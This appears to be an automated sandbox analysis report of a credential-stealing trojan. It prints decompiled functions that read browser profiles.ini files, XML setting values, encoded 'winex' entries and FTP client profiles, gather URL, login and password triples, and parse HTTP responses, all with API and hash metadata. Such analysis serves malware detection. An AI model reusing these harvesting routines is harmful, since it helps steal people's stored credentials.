Instruction Fuzzy Hash: 8A116077210505F6CF122F65EC02ACF3E51EB66398B008137F919A81A1E3BD8DD196CC

Uniqueness

Uniqueness Score: -1.00%

Function 0041098D, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 135
stringCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0041098D(signed int __eax, void* __ecx, signed int __edx) {
				void* _v8;
				char* _v12;
				CHAR* _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				void* _v32;
				void* _v36;
				CHAR* _v40;
				char _v44;
				CHAR* _v48;
				CHAR* _t46;
				int _t50;
				CHAR* _t54;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t65;
				int _t68;
				CHAR* _t69;
				CHAR* _t70;
				void* _t71;
				signed int _t73;
				signed int _t74;
				char* _t75;

				_t71 = __ecx;
				_t73 = __edx ^ __eax;
				_t42 = __eax ^ _t73;
				_t74 = _t73 ^ __eax ^ _t73;
				if( *0x414411 == 0 ||  *0x41441d == 0) {
					return 0;
				} else {
					_t69 =  *0x417691; // 0x0
					while(1) {
						_t70 = _t69;
						__eflags = _t70;
						if(_t70 == 0) {
							break;
						}
						E00402AF8(_t42, _t74);
						__eflags =  *0x417695;
						if( *0x417695 == 0) {
							L7:
							_v8 = 0;
							_t46 =  *0x41441d(_t70[4], 0, _t70[4], 2, 0,  &_v8);
							__eflags = _t46;
							if(_t46 == 0) {
								_v12 = E0040294B(_t70[4]);
								_t50 = LCMapStringA(0x400, 0x100, _t70[4], lstrlenA(_t70[4]), _v12, _t49);
								__eflags = _t50;
								if(_t50 == 0) {
									L12:
									E004017D5(_v12);
									_t75 = "r`l`oui`";
									L13:
									_v8 = 0;
									_t54 =  *0x41441d(_t70[4], 0, _t75, 2, 0,  &_v8);
									__eflags = _t54;
									if(_t54 != 0) {
										goto L14;
									}
								} else {
									_v8 = 0;
									_t65 =  *0x41441d(_t70[4], 0, _v12, 2, 0,  &_v8);
									__eflags = _t65;
									if(_t65 == 0) {
										goto L12;
									} else {
										E004017D5(_v12);
										goto L14;
									}
								}
							} else {
								L14:
								_v44 = 0x20;
								_v40 = 1;
								_push(_t70[4]);
								_pop( *_t23);
								_push(_t70[8]);
								_pop( *_t25);
								_v28 = 0;
								_v24 = 0;
								_v20 = 0;
								_v16 = 0;
								_t57 =  &_v44;
								_push(_t57);
								_push(_v8);
								L00410E96();
								__eflags = _t57;
								if(_t57 == 0) {
									_v48 = 0;
								} else {
									__eflags = _v16;
									if(_v16 != 0) {
										_push(_v16);
										_pop( *0x4140fe);
									}
									_v48 = 1;
								}
								_t59 =  *0x414411(_v8);
								_t60 = _t59;
								__eflags = _t59;
								if(__eflags != 0) {
									E004105CE(_t60, _t71, _t74, __eflags);
									__eflags =  *0x414409;
									if( *0x414409 != 0) {
										 *0x414409();
									}
									 *0x4140fe = 0x80000001;
								}
								__eflags = _v48;
								if(_v48 != 0) {
									_push(_v16);
									_push(_v8);
									L00410E9C();
								}
								CloseHandle(_v8);
							}
							asm("cld");
							_t42 = 0;
							_t71 = 0xffffffff;
							asm("repne scasb");
							__eflags =  *_t75;
							if( *_t75 != 0) {
								goto L13;
							}
						} else {
							_t68 = lstrcmpiA( *0x417695, _t70[4]);
							_t42 = _t68;
							__eflags = _t68;
							if(_t68 != 0) {
								goto L7;
							} else {
							}
						}
						_t69 =  *_t70;
					}
					return 1;
				}
			}

0x0041098d
0x00410995
0x00410997
0x00410999
0x004109a2
0x004109b2
0x004109b3
0x004109b3
0x00410b4f
0x00410b4f
0x00410b4f
0x00410b51
0x00000000
0x00000000
0x004109be
0x004109c3
0x004109ca
0x004109e3
0x004109e3
0x004109fa
0x00410a00
0x00410a02
0x00410a11
0x00410a2e
0x00410a33
0x00410a35
0x00410a62
0x00410a65
0x00410a6a
0x00410a6f
0x00410a6f
0x00410a84
0x00410a8a
0x00410a8c
0x00000000
0x00000000
0x00410a37
0x00410a37
0x00410a4e
0x00410a54
0x00410a56
0x00000000
0x00410a58
0x00410a5b
0x00000000
0x00410a5b
0x00410a56
0x00410a04
0x00410a92
0x00410a92
0x00410a99
0x00410aa0
0x00410aa3
0x00410aa6
0x00410aa9
0x00410aac
0x00410ab3
0x00410aba
0x00410ac1
0x00410ac8
0x00410acb
0x00410acc
0x00410acf
0x00410ad4
0x00410ad6
0x00410af0
0x00410ad8
0x00410ad8
0x00410adc
0x00410ade
0x00410ae1
0x00410ae1
0x00410ae7
0x00410ae7
0x00410afa
0x00410b00
0x00410b00
0x00410b02
0x00410b04
0x00410b09
0x00410b10
0x00410b12
0x00410b12
0x00410b18
0x00410b18
0x00410b22
0x00410b26
0x00410b28
0x00410b2b
0x00410b2e
0x00410b2e
0x00410b36
0x00410b36
0x00410b3b
0x00410b3c
0x00410b3e
0x00410b43
0x00410b45
0x00410b47
0x00000000
0x00000000
0x004109cc
0x004109d5
0x004109da
0x004109da
0x004109dc
0x00000000
0x00000000
0x004109de
0x004109dc
0x00410b4d
0x00410b4d
0x00410b5f
0x00410b5f

APIs

lstrcmpiA.KERNEL32(?), ref: 004109D5
lstrlenA.KERNEL32(?,?), ref: 00410A17
LCMapStringA.KERNEL32(00000400,00000100,?,00000000,?,00000000,?,?), ref: 00410A2E
LoadUserProfileA.USERENV(00000000,00000020,?,?), ref: 00410ACF
UnloadUserProfile.USERENV(00000000,00000000), ref: 00410B2E
CloseHandle.KERNEL32(00000000), ref: 00410B36

Strings

, xrefs: 00410A92
r`l`oui`, xrefs: 00410A6A, 00410A7E

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ProfileUser$CloseHandleLoadStringUnloadlstrcmpilstrlen
String ID: $r`l`oui`
API String ID: 1092964125-956245557
Opcode ID: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
Instruction ID: 97e36a9f464fd7594aaf26f4fe361f5543e1ef418d0b81fc890e2415056c999a
Opcode Fuzzy Hash: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
Instruction Fuzzy Hash: 54516E71A00208EFEF119FA1DD46BDEBA75EB04318F14C066E510A91E2D7F99AD0DF29

Uniqueness

Uniqueness Score: -1.00%

Function 00409713, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00409713(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				CHAR* _v20;
				void* _t33;
				void* _t35;
				intOrPtr _t38;
				char* _t57;
				char* _t61;
				char* _t62;
				CHAR* _t63;

				_t33 = E00401E9C(_a8);
				if(_t33 != 0) {
					_t35 = E00401E9C(_a12);
					if(_t35 != 0) {
						if(E004024D7(_a8) != 0) {
							_t38 = E00401D15(_a8, 0);
						} else {
							_t38 = E00401D15(_a8, "\\");
						}
						_v16 = _t38;
						_v12 = E00401D15(_v16, "profiles.ini");
						_v8 = E004017EC(0xfdea);
						_v20 = E004017EC(0x1000);
						if(E00401E53(_v12) != 0 && GetPrivateProfileSectionNamesA(_v8, 0xfde8, _v12) > 2) {
							_t63 = _v8;
							if( *_t63 != 0) {
								do {
									if(StrStrIA(_t63, "Profile") != 0 && GetPrivateProfileStringA(_t63, "Path", 0x4140dc, _v20, 0xfff, _v12) != 0) {
										if(GetPrivateProfileIntA(_t63, "IsRelative", 1, _v12) != 1) {
											E004096FB(_a4, _v20, _a12);
										} else {
											_t57 = E00401D15(_v16, _v20);
											_push(_t57);
											_t61 = _t57;
											while(1) {
												_t62 = _t61;
												if(_t62 == 0 ||  *_t62 == 0) {
													break;
												}
												if( *_t62 == 0x2f) {
													 *_t62 = 0x5c;
												}
												_t61 = _t62 + 1;
											}
											E004096FB(_a4, _t57, _a12);
											E004017D5();
										}
									}
									asm("cld");
									asm("repne scasb");
								} while ( *_t63 != 0);
							}
						}
						E004017D5(_v16);
						E004017D5(_v20);
						E004017D5(_v12);
						E004017D5(_v8);
						return E004096FB(_a4, _a8, _a12);
					} else {
						return _t35;
					}
				} else {
					return _t33;
				}
			}

Strings

IsRelative, xrefs: 004097F6
Profile, xrefs: 004097C3
profiles.ini, xrefs: 00409764
Path, xrefs: 004097E2

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 0-4107377610
Opcode ID: 4ad7dd6626449d0865b862079872fbee4eda8d38e9c2d9578c020e7ae1480238
Instruction ID: 9f854c8f064d301336fa07c1f25567edbfe6f4ad31a08e24bdafbc402817c31b
Opcode Fuzzy Hash: 4ad7dd6626449d0865b862079872fbee4eda8d38e9c2d9578c020e7ae1480238
Instruction Fuzzy Hash: 4B413D72910109BACF223FA1DC42AAE7B72AF55714F24817BF511751F3D77D4DA0AA08

Uniqueness

Uniqueness Score: -1.00%

Function 004039C1, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004039C1(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char** _a12) {
				char* _v8;
				int _v12;
				char*** _v16;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t54;
				void* _t66;
				char* _t81;
				char* _t82;
				void* _t83;
				char* _t86;
				char* _t87;
				void* _t88;

				_t72 = __edx;
				_v8 = E004017EC(0x7d00);
				E00401000( &_v16, __edx,  &_v16);
				_t66 = 0;
				while(E00403879(_a4, _v16, 0xfa00, 0xa) != 0 && E0040106A(_t39, _t72, _v16) <= 0xfa00) {
					if(E00403973(_t72, _v16) == 0) {
						continue;
					}
					E00401273(_t44, _t72, _v16);
					_t76 =  *_v16;
					( *_v16)[3](_v16, _v8, 0x2134, 0);
					_v12 = 0;
					_t47 = StrStrIA(_v8, "Content-Length:");
					_push(_t66);
					_t48 = _t47;
					if(_t48 != 0) {
						_t86 =  &(_t48[lstrlenA("Content-Length:")]);
						_push(_t86);
						_t87 =  &(_t86[1]);
						asm("repne scasb");
						 *((char*)(_t87 - 1)) = 0;
						_v12 = StrToIntA(_t87);
						_t88 = _t87;
						 *((char*)(_t88 - 1)) = 0xd;
					}
					_pop(_t67);
					_t49 = StrStrIA(_v8, "Location:");
					_t50 = _t49;
					if(_t50 != 0) {
						_t81 =  &(_t50[lstrlenA("Location:")]);
						_push(_t81);
						_t82 =  &(_t81[1]);
						asm("repne scasb");
						 *((char*)(_t82 - 1)) = 0;
						_push(_t82);
						_t50 = E0040294B(_t82);
						_t76 = _a12;
						if(_t76 == 0) {
							_t50 = E004017D5(_t50);
						} else {
							 *_t76 = _t50;
						}
						_pop(_t83);
						 *((char*)(_t83 - 1)) = 0xd;
					}
					_pop(_t66);
					E004012C7(_t50, _t76, _v16);
					if(_v12 <= 0) {
						_v12 = 0xa00000;
					}
					_t54 = E0040106A(E004038EB(_a4, _v16, _v12), _t76, _v16);
					if(_t54 != 0) {
						if(_t54 != 0) {
							_push(_a8);
							_push(_v16);
							if(( *_v16)[0xd]() >= 0) {
								_t66 = 1;
							}
						}
					}
					break;
				}
				( *_v16)[2](_v16);
				E004017D5(_v8);
				return _t66;
			}

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010

StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403A47
lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403A58
StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403A79
StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403A90
lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403AA1

Strings

Content-Length:, xrefs: 00403A3F, 00403A53
Location:, xrefs: 00403A88, 00403A9C

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$AllocCreateGlobalLocalStream
String ID: Content-Length:$Location:
API String ID: 470334641-2400408565
Opcode ID: b7377cc51f20d8385b9af4971295555af70c5370bc9c8b37470087e9bf613e51
Instruction ID: 7570254d534122b067dba275b6dbafb516b56477de4d3a8d0c02791677091e30
Opcode Fuzzy Hash: b7377cc51f20d8385b9af4971295555af70c5370bc9c8b37470087e9bf613e51
Instruction Fuzzy Hash: BD41B335B04109BBDB11AFA2CC82B9EFF79EF41309F204177B110B62E1DB799A519A58

Uniqueness

Uniqueness Score: -1.00%

Function 0040424A, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040424A() {
				char _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t10;
				struct HINSTANCE__* _t15;

				_t4 = GetModuleHandleA("kernel32.dll");
				_t15 = _t4;
				_v8 = 0;
				if(_t4 == 0 || GetProcAddress(_t15, "GetNativeSystemInfo") == 0) {
					L5:
					return 0;
				} else {
					_t10 = GetProcAddress(_t15, "IsWow64Process");
					if(_t10 == 0) {
						goto L5;
					} else {
						 *_t10(GetCurrentProcess(),  &_v8);
						if(_v8 == 0) {
							goto L5;
						} else {
							return 1;
						}
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404258
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404270
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00404281
GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00404290

Strings

IsWow64Process, xrefs: 0040427B
GetNativeSystemInfo, xrefs: 0040426A
kernel32.dll, xrefs: 00404253

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CurrentHandleModuleProcess
String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
API String ID: 977827838-3073145729
Opcode ID: 85bb568691fe3cf35566aedb2be22b3567b0f5cb7530412735663113f7866611
Instruction ID: 03068760d695a9cd2c9c4a5cba3fee66ffd19866524c567bff6887aa110550f4
Opcode Fuzzy Hash: 85bb568691fe3cf35566aedb2be22b3567b0f5cb7530412735663113f7866611
Instruction Fuzzy Hash: FAF0B4B371020526C75072F9AC46BDF219C87C13A9F290677B611F22C2E9BCCDC04268

Uniqueness

Uniqueness Score: -1.00%

Function 0040D8B9, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D8B9(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char* _v40;
				char* _v44;
				char _v45;
				void* _t28;
				intOrPtr* _t31;
				intOrPtr* _t35;
				void* _t38;
				intOrPtr* _t40;
				void* _t43;
				void* _t52;
				char* _t57;
				char* _t59;

				_t52 = __ecx;
				_t28 = E00401E53(_a8);
				if(_t28 != 0) {
					_t31 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t31;
					if(_t31 != 0) {
						_v24 = E004017EC(_v8);
						E00401823(_v12, _v24, _v8);
						_t57 = _v24;
						while(1) {
							__eflags =  *_t57;
							if( *_t57 == 0) {
								break;
							}
							_t35 = StrStrA(_t57, "<setting name=\"");
							__eflags = _t35;
							if(_t35 != 0) {
								_t59 = _t35 + lstrlenA("<setting name=\"");
								_v28 = _t59;
								_t38 = StrStrA(_t59, 0x4160dc);
								__eflags = _t38;
								if(_t38 != 0) {
									_v33 =  *_t38;
									_v32 = _t38;
									_t40 = StrStrA(_t59, "value=\"");
									__eflags = _t40;
									if(_t40 != 0) {
										_t57 = _t40 + lstrlenA("value=\"");
										_v40 = _t57;
										_t43 = StrStrA(_t57, 0x4160dc);
										__eflags = _t43;
										if(_t43 != 0) {
											_v45 =  *_t43;
											_v44 = _t43;
											 *_v32 = 0;
											 *_v44 = 0;
											E0040D82C(_t52, _a4, _v28, _v40);
											 *_v32 = _v33;
											 *_v44 = _v45;
											continue;
										}
										break;
									}
									break;
								}
								break;
							}
							break;
						}
						E004017D5(_v24);
						return E00401FB0( &_v20);
					}
					return _t31;
				} else {
					return _t28;
				}
			}

Strings

value=", xrefs: 0040D944, 0040D957
<setting name=", xrefs: 0040D906, 0040D91C

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: <setting name="$value="
API String ID: 0-3468128162
Opcode ID: 920cccf1eea38dbea6c11ca90c5276b346da53b6dd0d9b6f1c91fb608a0f05e7
Instruction ID: 9c34023bf8df2dae677bc546254fcee4e5c90e439810f2e6e89c6393bea3dfb1
Opcode Fuzzy Hash: 920cccf1eea38dbea6c11ca90c5276b346da53b6dd0d9b6f1c91fb608a0f05e7
Instruction Fuzzy Hash: 3B31B7B2C042599ECF11ABE1CC42AEE7FB49F19354F150067E440B7292E27D4D84DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401F1B, Relevance: 10.6, APIs: 7, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F1B(void* __eflags, CHAR* _a4, void** _a8) {
				void* _t11;
				void* _t12;
				void* _t18;
				void* _t20;
				void** _t24;

				_t24 = _a8;
				E00401803(_t24, 0x10);
				_t11 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0);
				 *_t24 = _t11;
				_t12 = _t11 + 1;
				if(_t12 != 0) {
					_t24[3] = GetFileSize(_t12 - 1, 0);
					_t18 = CreateFileMappingA( *_t24, 0, 2, 0, 0, 0);
					if(_t18 == 0) {
						CloseHandle( *_t24);
						 *_t24 = 0xffffffff;
					} else {
						_t24[1] = _t18;
						_t20 = MapViewOfFile(_t18, 4, 0, 0, 0);
						_t24[2] = _t20;
						if(_t20 == 0) {
							CloseHandle(_t24[1]);
							CloseHandle( *_t24);
							 *_t24 = 0xffffffff;
						}
					}
				}
				return 0 | _t24[2] != 0x00000000;
			}

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401F3C
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000010), ref: 00401F4A
CreateFileMappingA.KERNEL32 ref: 00401F5E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003), ref: 00401F73
CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000), ref: 00401F82
CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?), ref: 00401F89
CloseHandle.KERNEL32(?,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401F98

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseHandle$Create$MappingSizeView
String ID:
API String ID: 3733816638-0
Opcode ID: 59c95c0024b39b49a26cfa13d008d87d8e2c1c3143e065d0beb725acf6b20e2a
Instruction ID: a753e19abee84ff0306ed9f3ec9f6224fb0fe799db7add8b0a1e6242fd717f9b
Opcode Fuzzy Hash: 59c95c0024b39b49a26cfa13d008d87d8e2c1c3143e065d0beb725acf6b20e2a
Instruction Fuzzy Hash: D5117971680301BBEB312F75CC83F553A94BB01718F24C6667654BD1E6E6FC99908A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00408500, Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408500(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char* _v12;
				intOrPtr _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				intOrPtr _v32;
				void* _t80;
				char* _t87;
				void* _t101;
				char* _t112;
				char* _t137;
				char* _t138;

				_t136 = __edx;
				_v16 = E0040106A(_t80, __edx, _a4);
				if(_v16 >= 0x10) {
					E00401273(_t81, __edx, _a4);
					_v12 = 1;
					_v8 = E00401304(__eflags, _a4,  &_v12);
					__eflags = _v12;
					if(_v12 == 0) {
						L5:
						return 1;
					} else {
						__eflags = _v8 - 2;
						if(_v8 < 2) {
							goto L5;
						} else {
							__eflags = _v8 - 6;
							if(__eflags <= 0) {
								_t87 = E00401304(__eflags, _a4,  &_v12);
								__eflags = _v12;
								if(_v12 == 0) {
									L8:
									return 1;
								} else {
									__eflags = _t87;
									if(_t87 == 0) {
										__eflags = _v8 - 5;
										if(__eflags < 0) {
											_v32 = E00401304(__eflags, _a4,  &_v12);
											E00401388( &_v12, _a4, 4,  &_v12);
										} else {
											E00401388( &_v12, _a4, 0x18,  &_v12);
											_v32 = E00401304(__eflags, _a4,  &_v12);
										}
										E0040809D(_a4,  &_v12);
										__eflags = _v32 - 1;
										if(__eflags == 0) {
											E00408390(_t136, __eflags, _a4, _a8, _v8,  &_v12);
											E0040809D(_a4,  &_v12);
										}
										__eflags = _v12;
										if(__eflags != 0) {
											E00408390(_t136, __eflags, _a4, _a8, _v8,  &_v12);
											__eflags = _v12;
											if(__eflags != 0) {
												_t137 = E00401304(__eflags, _a4,  &_v12);
												while(1) {
													__eflags = _v12;
													if(_v12 == 0) {
														break;
													}
													_t138 = _t137;
													__eflags = _t138;
													if(_t138 != 0) {
														_t101 = E0040143F(_a4);
														__eflags = _t101 - _v16;
														if(_t101 != _v16) {
															__eflags = _v8 - 6;
															if(__eflags >= 0) {
																E00401304(__eflags, _a4,  &_v12);
																E0040809D(_a4,  &_v12);
																E0040809D(_a4,  &_v12);
															}
															_v20 = E0040824E(_t136, __eflags, _a4,  &_v12);
															_v24 = E0040824E(_t136, __eflags, _a4,  &_v12);
															_v28 = E0040824E(_t136, __eflags, _a4,  &_v12);
															__eflags = _v20;
															if(_v20 != 0) {
																__eflags = _v24;
																if(_v24 != 0) {
																	__eflags = _v28;
																	if(_v28 != 0) {
																		__eflags = _v12;
																		if(_v12 != 0) {
																			_t112 = StrStrIA(_v20, "ftp://");
																			__eflags = _t112;
																			if(_t112 == 0) {
																				_t112 = StrStrIA(_v20, "http://");
																				__eflags = _t112;
																				if(_t112 == 0) {
																					_t112 = StrStrIA(_v20, "https://");
																				}
																			}
																			__eflags = _t112;
																			if(_t112 != 0) {
																				E00401486(_a8, 0xbeef0000);
																				E004014E8(_a8, _v20);
																				E004014E8(_a8, _v24);
																				E004014E8(_a8, _v28);
																			}
																		}
																	}
																}
															}
															E004017D5(_v20);
															E004017D5(_v24);
															E004017D5(_v28);
															_t137 = _t138 - 1;
															__eflags = _t137;
															continue;
														} else {
														}
													}
													break;
												}
												return _v12;
											} else {
												return 0;
											}
										} else {
											return 0;
										}
									} else {
										goto L8;
									}
								}
							} else {
								goto L5;
							}
						}
					}
				} else {
					return 1;
				}
			}

Strings

http://, xrefs: 004086C5
https://, xrefs: 004086D6
ftp://, xrefs: 004086B4

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ftp://$http://$https://
API String ID: 0-2804853444
Opcode ID: a9de3c513cf4fe75db66f6004dda229fbde7a4a8d9b20780759a0ebf57d53af8
Instruction ID: fd2999549266695ab435609b8dc0b121c2d8f6895c951fe97b07cddbebe2be1e
Opcode Fuzzy Hash: a9de3c513cf4fe75db66f6004dda229fbde7a4a8d9b20780759a0ebf57d53af8
Instruction Fuzzy Hash: 3561F771800108FEDF11AF91CD41AEEBBB9EB04358F10847BF941B61A1DB398B95DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E163, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040E163(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				CHAR* _v28;
				unsigned int _v32;
				intOrPtr _v36;
				void* _t35;
				unsigned int _t38;
				unsigned int _t42;
				intOrPtr* _t45;
				unsigned int _t47;
				char* _t48;
				unsigned int _t55;
				unsigned int _t59;
				char _t66;
				char* _t67;

				_t35 = E00401E53(_a8);
				if(_t35 != 0) {
					_t38 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t38;
					if(_t38 != 0) {
						_v24 = E004017EC(_v8);
						E00401823(_v12, _v24, _v8);
						_t67 = _v24;
						while(1) {
							__eflags =  *_t67;
							if( *_t67 == 0) {
								break;
							}
							_t42 = StrStrA(_t67, "winex=\"");
							__eflags = _t42;
							if(_t42 != 0) {
								_t67 = _t42 + lstrlenA("winex=\"");
								_v28 = _t67;
								_t45 = StrStrA(_t67, "\"/>");
								__eflags = _t45;
								if(_t45 != 0) {
									 *_t45 = 0;
									_push(_t45);
									_push( *_t45);
									_t47 = lstrlenA(_v28);
									__eflags = _t47;
									if(_t47 != 0) {
										_v32 = _t47;
										_v36 = E0040294B(_v28);
										_t55 = E00402A3B(_v36, _v32);
										__eflags = _t55;
										if(_t55 != 0) {
											_v32 = _v32 >> 1;
											_t59 = E004041BC(_v36,  &_v32, 0);
											__eflags = _t59;
											if(_t59 != 0) {
												E00401486(_a4, 0xbeef0001);
												E004014E8(_a4, _v28);
												E004014BC(_a4, _v36, _v32);
											}
										}
										E004017D5(_v36);
									}
									_pop(_t66);
									_pop(_t48);
									 *_t48 = _t66;
									continue;
								}
								break;
							}
							break;
						}
						E00401486(_a4, 0xbeef0002);
						E004014BC(_a4, _v24, _v8);
						E004017D5(_v24);
						return E00401FB0( &_v20);
					}
					return _t38;
				} else {
					return _t35;
				}
			}

Strings

winex=", xrefs: 0040E1B0, 0040E1C6
"/>, xrefs: 0040E1D5

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "/>$winex="
API String ID: 0-1498080979
Opcode ID: 9f9330b0a3a858bb5f104b66e8390021cddcbf3b8e479275484bd8ff3157b7fc
Instruction ID: 6ddc7879a2345c95c0110d8438dd60d4332b404bb8441acc01c28196f8b8e54f
Opcode Fuzzy Hash: 9f9330b0a3a858bb5f104b66e8390021cddcbf3b8e479275484bd8ff3157b7fc
Instruction Fuzzy Hash: 05315072D00109AACF126BA2CD02EEE7F75AF54344F14447BF510B51B1D73D8AA1ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 00407F95, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00407F95(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t9;
				void* _t18;
				char* _t19;
				char* _t20;

				_v8 = E0040150D(_a4, 0x20, 0);
				_t20 =  *0x414082; // 0x0
				_t19 =  *0x414086; // 0x0
				if( *_t19 != 0) {
					do {
						_push(StrStrIA(_t20, "FTPCON"));
						_t9 = StrStrIA(_t19, "FTP CONTROL");
						_pop(_t18);
						if(_t9 != 0) {
							L3:
							E00404131(_a4, E00401D69(E0040234A(_t23, _t20), "\\Profiles"), ".prf", 0xbeef0000);
							E004017D5(_t12);
						} else {
							_t18 = _t18;
							_t23 = _t18;
							if(_t18 != 0) {
								goto L3;
							}
						}
						while( *_t20 != 0) {
							_t20 =  &(_t20[1]);
							__eflags = _t20;
						}
						_t20 =  &(_t20[1]);
						asm("cld");
						asm("repne scasb");
						_t25 =  *_t19;
					} while ( *_t19 != 0);
				}
				return E00401553(_t18, _t25, _a4, _v8);
			}

APIs

StrStrIA.SHLWAPI(00000000,FTPCON), ref: 00407FC3
StrStrIA.SHLWAPI(00000000,FTP CONTROL,00000000,00000000,FTPCON), ref: 00407FCF

Strings

FTP CONTROL, xrefs: 00407FC9
FTPCON, xrefs: 00407FBD
.prf, xrefs: 00407FF4
\Profiles, xrefs: 00407FE3

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: .prf$FTP CONTROL$FTPCON$\Profiles
API String ID: 0-2908215140
Opcode ID: 50a2e9bfdafcc93abbe3dd01e3f3dab718944d800bd44c445079ad6e10f4cdd6
Instruction ID: b7a8e328a3ee8981745373635da00d8c6f72f6bbf36a454012797349fecb33ea
Opcode Fuzzy Hash: 50a2e9bfdafcc93abbe3dd01e3f3dab718944d800bd44c445079ad6e10f4cdd6
Instruction Fuzzy Hash: 43012870A00605B9DB216772CD02FEF3E5B9BC4328F24443BF849B51E2EA7C5B81869C

Uniqueness

Uniqueness Score: -1.00%

Function 00401944, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401944(void* __ecx, void* __edx, intOrPtr _a4, CHAR* _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v280;
				void* _t26;
				signed int _t40;
				signed int _t42;
				void* _t44;

				_t45 = __edx;
				_t44 = __ecx;
